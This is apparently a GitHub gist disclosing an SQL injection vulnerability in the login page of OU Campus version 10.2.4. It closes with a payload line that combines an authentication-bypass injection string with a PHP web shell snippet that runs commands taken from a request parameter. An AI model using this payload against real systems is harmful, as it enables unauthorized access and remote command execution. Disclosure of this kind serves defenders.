Mr-Akuma
/ gist:8d84b564fb051caa1b1ea31b24f6b9fb
Last active
September 17, 2022 05:29
SQL Injection in OU Campus
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: OU Campus login page v 10.2.4 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. | |
| payload: " OR 1 = 1 -- - , <?php system($_GET["cmd"]); ?> |